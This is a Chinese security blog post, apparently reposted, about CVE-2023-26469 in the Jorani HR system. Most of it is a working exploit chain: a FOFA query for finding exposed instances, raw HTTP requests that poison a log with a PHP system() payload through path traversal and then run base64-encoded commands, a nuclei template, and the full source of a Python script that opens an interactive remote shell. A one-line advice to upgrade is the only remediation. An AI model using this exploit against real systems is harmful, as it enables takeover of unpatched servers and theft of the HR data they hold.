Jorani远程命令执行漏洞一键远控(CVE-2023-26469)

渗透技巧 8个月前 admin
166 0 0


使


01

漏洞名称



Jorani远程命令执行漏洞

02


漏洞影响


Jorani < 1.0.2

Jorani远程命令执行漏洞一键远控(CVE-2023-26469)



03


漏洞描述


Jorani 是一款开源的人力资源(HR)管理系统,旨在帮助组织更好地管理员工的休假、请假、加班和其他人事管理任务。这个系统提供了一个用户友好的Web界面,允许员工和管理人员轻松地提交、审批和跟踪休假请求,同时也提供了一些人事管理功能,如员工档案管理和报告生成。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。


04


FOFA搜索语句

title="Jorani"

Jorani远程命令执行漏洞一键远控(CVE-2023-26469)



05


漏洞复现


第一步,访问靶场/session/login拿到Cookie

GET /session/login HTTP/1.1Host: 192.168.190.30User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36Connection: closeAccept-Encoding: gzip

响应内容如下,其中csrf_cookie_jorani用于后续请求

HTTP/1.1 200 OKConnection: closeCache-Control: no-store, no-cache, must-revalidateContent-Type: text/html; charset=UTF-8Date: Tue, 24 Oct 2023 09:34:28 GMTExpires: Thu, 19 Nov 1981 08:52:00 GMTLast-Modified: Tue, 24 Oct 2023 09:34:28 GMTPragma: no-cacheServer: Apache/2.4.54 (Debian)Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnlyVary: Accept-Encoding

第二步,向靶场发送POST请求,执行函数并进行base64编码

POST /session/login HTTP/1.1Host: 192.168.190.30User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36Connection: closeContent-Length: 252Content-Type: application/x-www-form-urlencodedCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99rAccept-Encoding: gzip
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


第三步,向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串

Jorani远程命令执行漏洞一键远控(CVE-2023-26469)


GET /pages/view/log-2023-10-24 HTTP/1.1Host: 192.168.190.30User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Connection: closeCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99rK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=X-REQUESTED-WITH: XMLHttpRequestAccept-Encoding: gzip

响应数据包如下,其中包含了uid=33(www-data) gid=33(www-data) groups=33(www-data)

HTTP/1.1 401 UnauthorizedConnection: closeContent-Length: 7043Cache-Control: no-store, no-cache, must-revalidateContent-Type: text/html; charset=UTF-8Date: Tue, 24 Oct 2023 09:34:29 GMTExpires: Thu, 19 Nov 1981 08:52:00 GMTLast-Modified: Tue, 24 Oct 2023 09:34:29 GMTPragma: no-cacheServer: Apache/2.4.54 (Debian)Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:29 GMT; Max-Age=7200; path=/Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:29 GMT; Max-Age=7200; path=/; HttpOnly
<!DOCTYPE html><html lang="../../application/logs"><head> <meta name="viewport" content="width=device-width, initial-scale=1"> ...ERROR - 2023-10-24 11:33:37 --> {controllers/session/login} Invalid login id or password for user=---------uid=33(www-data) gid=33(www-data) groups=33(www-data)---------

证明命令执行成功



06


nuclei poc


nuclei中已经有该POC了。

poc核心内容如下

id: CVE-2023-26469
info: name: Jorani 1.0.0 - Remote Code Execution author: pussycat0x severity: critical description: | Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server. remediation: |    Upgrade Jorani to a patched version or apply the necessary security patches. metadata: verified: true max-request: 3 vendor: jorani product: jorani shodan-query: http.favicon.hash:-2032163853 tags: cve,cve2023,jorani,rce,packetstormvariables: cmd: "id" payload: "<?php if(isset($_SERVER['HTTP_{{header}}'])){system(base64_decode($_SERVER['HTTP_{{header}}']));} ?>" header: "{{to_upper(rand_base(12))}}"
http: - raw: - | GET /session/login HTTP/1.1 Host: {{Hostname}} - | POST /session/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword - | GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1 Host: {{Hostname}} X-REQUESTED-WITH: XMLHttpRequest {{header}}: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}}
cookie-reuse: true
matchers-condition: and matchers: - type: regex part: body_3 regex: - 'uid=(d+)(.*?) gid=(d+)(.*?) groups=([d,]+)(.*?)'
- type: status part: header_3 status: - 401
extractors: - type: regex part: body group: 1 internal: true name: csrf regex: - 'name="csrf_test_jorani" value="(.*?)"'# digest: 4a0a004730450221008f4bc6475a44cede273521c31f6ca4732c6f9d7ca427b5f10f43ed1dfbb7343a02205247e6f125d2dbaab76d7cce782dc77567ec7a7675b8425fea61f8c666a511ea:922c64590222798bb761d5b6d8e72950

运行POC

.nuclei.exe -t C:UsersDELLnuclei-templateshttpcves2023CVE-2023-26469.yaml -l .1.txt

Jorani远程命令执行漏洞一键远控(CVE-2023-26469)



07


一键远控


github上有个开源的EXP

https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py

运行

python CVE_Jorani.py https://192.168.190.30

Jorani远程命令执行漏洞一键远控(CVE-2023-26469)

exp文件内容如下

"""vulnerability covered by CVE-2023-26469"""import readlineimport requestsimport datetimeimport sysimport reimport base64import randomimport string
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
msg = lambda x,y="n":print(f'x1b[92m[+]x1b[0m {x}', end=y)err = lambda x,y="n":print(f'x1b[91m[x]x1b[0m {x}', end=y)log = lambda x,y="n":print(f'x1b[93m[?]x1b[0m {x}', end=y)
CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"')CMD_PATTERN = re.compile('---------(.*?)---------', re.S)
URLS = { 'login' : '/session/login', 'view' : '/pages/view/',}
alphabet = string.ascii_uppercaseHEADER_NAME = ''.join(random.choice(alphabet) for i in range(12))
BypassRedirect = { 'X-REQUESTED-WITH' : 'XMLHttpRequest', HEADER_NAME : ""}
INPUT = "x1b[92mjrjgjkx1b[0m@x1b[41mjoranix1b[0m(PSEUDO-TERM)n$ " # The input used for the pseudo term
u = lambda x,y: x + URLS[y]
POISON_PAYLOAD = "<?php if(isset($_SERVER['HTTP_" + HEADER_NAME + "'])){system(base64_decode($_SERVER['HTTP_" + HEADER_NAME + "']));} ?>"PATH_TRAV_PAYLOAD = "../../application/logs"
if __name__ == '__main__': print(""" /!\ Do not use this if you are not authorized to /!\ """) log("POC made by @jrjgjk (Guilhem RIOUX)", "nn")
if(len(sys.argv) == 1): err(f"Usage: {sys.argv[0]} <url>") exit(0)
log(f"Header used for exploit: {HEADER_NAME}")
t = sys.argv[1]
s = requests.Session() log("Requesting session cookie") res = s.get(u(t,"login"), verify = False)
C = s.cookies.get_dict()
Date = datetime.date.today() log_file_name = f"log-{Date.year}-{str(Date.month).zfill(2)}-{str(Date.day).zfill(2)}"
csrf_token = re.findall(CSRF_PATTERN, res.text)[0] log(f"Poisonning log file with payload: '{POISON_PAYLOAD}'") log(f"Set path traversal to '{PATH_TRAV_PAYLOAD}'") msg(f"Recoveredd CSRF Token: {csrf_token}")
data = { "csrf_test_jorani" : csrf_token, "last_page" : "session/login", "language" : PATH_TRAV_PAYLOAD, "login" : POISON_PAYLOAD, "CipheredValue" : "DummyPassword" }
s.post(u(t,"login"), data=data)
log(f"Accessing log file: {log_file_name}")
exp_page = t + URLS['view'] + log_file_name
### Shell cmd = "" while True: cmd = input(INPUT) if(cmd in ['x', 'exit', 'quit']): break elif(cmd == ""): continue else: BypassRedirect[HEADER_NAME] = base64.b64encode(b"echo ---------;" + cmd.encode() + b" 2>&1;echo ---------;") res = s.get(exp_page, headers=BypassRedirect) cmdRes = re.findall(CMD_PATTERN, res.text) try: print(cmdRes[0]) except: print(res.text) err("Wow, there was a problem, are you sure of the URL ??") err('exiting..')        exit(0)


08


修复建议


升级到最新版本。



原文始发于微信公众号(AI与网安):Jorani远程命令执行漏洞一键远控(CVE-2023-26469)

版权声明:admin 发表于 2023年10月25日 上午8:01。
转载请注明:Jorani远程命令执行漏洞一键远控(CVE-2023-26469) | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...